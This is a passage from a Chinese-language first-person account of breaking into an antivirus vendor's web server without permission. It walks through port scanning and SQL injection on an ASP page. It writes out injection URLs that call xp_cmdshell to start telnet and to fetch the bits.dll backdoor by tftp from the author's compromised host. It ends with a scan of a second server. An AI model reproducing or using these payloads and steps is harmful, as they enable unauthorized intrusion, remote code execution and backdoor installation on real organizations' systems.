___ 1433 Microsoft-SQL-Server
以上就是该杀毒软件厂商主机所有的端口情况。通过端口信息可以分析出以下几点:
1 该主机关闭了Tcp 135 ,139 ,445端口。看来rpc溢出是没戏了。通过ipc$破解管理员密码也是不可能的事情。
2 去年我进入就是通过1433端口的sql2溢出并且通知了管理员看来sql2溢出也是没戏了。从我上次看到该主机管理员密码的复杂性来看暴力破解Sql的Sa用户密码也是不可能的事情。
3 从刚才的端口扫描我发现该主机禁止了Ping看来已经安装了防火墙。管理员可真是“吃一箭长一智”
最后我把渗透的重点就落在了80端口上。首先拿出Webdavsan检查一下是否存在Webdav漏洞。扫描结果如下:
看来这个主机看起来似乎比以前安全多了。到了这里基本就可以判断利用漏洞进入主机是不可能了。我决定去该杀毒软件厂商的站点上走走……
去网站上一看变化可真大。网站里面多出了一个在线杀毒的栏目。这个在我上次渗透的时候绝对没有。由于很好奇就决定先从这个在线杀毒asp程序下手。这个在线杀毒的Url是:http://xxx.xxxx.com/message.asp?ID =1在刚才扫描确定该主机开放了Tcp1433端口就说明这个站点是iis5.0+asp+sql server这样组合的。看到了这个URL我就联想到了国内最近讨论最热门的SQL Injection我先来手工检测一下。在http://xxx.xxxx.com/message.asp?ID =1的后面加上了一个逗号提交http://xxx.xxxx.com/message.asp?ID =1’服务器返回如下图:
看来这个asp程序没有过滤掉逗号。从服务器返回的Microsoft OLE DB Provider for SQL Server 错误 '80040e14'这句话可以看出来这个程序使用的数据库的确是Sql server。接下来在提交分号。提交的url如下: http://xxx.xxxx.com/message.asp?ID =1;提交以后返回的数据和提交逗号返回的差不多由于篇幅原因我就不在抓图了。通过以上测试可以判断该站使用的asp程序没做充分的过滤。看来有机会了。高兴ING。接下来测试该主机有没有删除Sql server的xp_cmdshell存储扩展。提交url: http://xxx.xxxx.com/message.asp?ID =1';exec master.dbo.xp_cmdshell 'net start telnet'----这句话的意思就是看看该站的asp程序是不是以sql server Sa用户执行的。结果返回了一个正常页面。由于该厂商在国内杀毒软件市场里名声非常大。如果我要是抓图的话就会……所以我就不能抓图给各位看管了。请大家理解。返回正常页面以后根据我以往的经验基本就可以判断SQL Injection是成功的。telnet xxx.xxx.xxx.xxx 结果返回如下:
虽然的失败了。但是是在连接了很长时间才返回失败的。根据以往的经验可以看出该主机一定安装有防火墙。因为一般只有开防火墙的情况下才能很长时间才有反映。在加上一开始扫描端口的时候根本PING不通该主机的IP地址我就更坚信不疑了。接下来我把我肉鸡的Tftp打开了。并把小榕的Bits.dll放在tftp的跟目录下。接下来回到杀毒软件厂商网站上提交Url:
http://xxx.xxxx.com/message.asp?ID =1 ;exec master.dbo.xp_cmdshell tftp -i 218.xxx.xxx.xxx get bits.dll;----接下来看肉鸡的Tftp有反映了。看下图:
SQL Injection成功。可是成功是成功了。问题又出来了。刚才我扫描该站主机的IP地址是.xxx.xxx.xxx.xx1可是刚才在我肉鸡上tftp显示下载bits的地址却是xxx.xxx.xxx.233为什么这个地址和网站地址IP地址不一样呢?我分析以后可能有以下两种情况。
1 在线杀毒的asp程序和该杀毒软件厂商官方网站不是一台服务器上。
2 在线杀毒的数据库也就是sql server不在一台服务器上。
接下来我又对xxx.xxx.xxx.233的主机进行了详细的扫描。结果如下:
+ + xxx.xxx.xxx.233
关键词:再次渗透国内XX知名杀毒软件厂商网站全记录